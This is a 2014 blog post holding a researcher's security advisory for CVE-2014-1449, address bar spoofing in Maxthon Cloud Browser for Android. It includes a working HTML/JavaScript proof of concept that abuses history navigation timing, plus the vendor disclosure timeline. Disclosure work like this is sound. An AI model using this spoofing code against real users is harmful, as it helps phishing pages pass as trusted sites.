Monday, March 10, 2014

[CVE-2014-1449] Maxthon Cloud Browser for Android 4.1.4.2000 Address Bar Spoofing

# Vulnerability: Maxthon Cloud Browser for Android Address Bar Spoofing
# Date: 10.01.2014
# Software Link: https://play.google.com/store/apps/details?id=com.mx.browser
# Vulnerable version: 4.1.4.2000
# Tested on: Android 4.4
# CVE: CVE-2014-1449
# Author: Pawel Wylecial
# http://h0wl.pl
1. Background

Description from the vendor website: "Maxthon Cloud Browser for Android is the first multi-tab browser with Maxthon’s innovative Cloud Services, including: Cloud Tabs, Cloud Push, Cloud Download and bookmarks/favorites syncing. With its cool design and out of the box features like Super Gestures, Reader Mode, App Center and more, this browser delivers a fresh and original browsing experience."

2. Vulnerability

Maxthon for Android is vulnerable to Address Bar Spoofing. Using the history API it was possible to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks.

3. Proof of Concept

<html>
<script>
function trigger() {
        w = window.open("http://howl.overflow.pl");
        w.location = "http://h0wl.pl";
        setTimeout('w.location = "a.html"', 1000);
        setTimeout('w.history.back();', 2000);
        setTimeout('w.history.forward();', 2100);
}
</script>
<a href="javascript:trigger();">click</a>
</html>


PoC in action: http://howl.overflow.pl/maxthon1.mp4


4. Fix

No response from the vendor, silent fix applied in 4.1.5.2000 (can't confirm here, updated straight to 4.1.6.2000) or 4.1.6.2000

5. Timeline

10.01.2014 - vulnerability reported
15.01.2014 - second e-mail
21.01.2014 - third
22.01.2014 - *silent fix applied (?), http://www.maxthon.com/android/changelog/
29.01.2014 - last try

10.03.2014 - advisory published

No comments:

Post a Comment

Note: only a member of this blog may post a comment.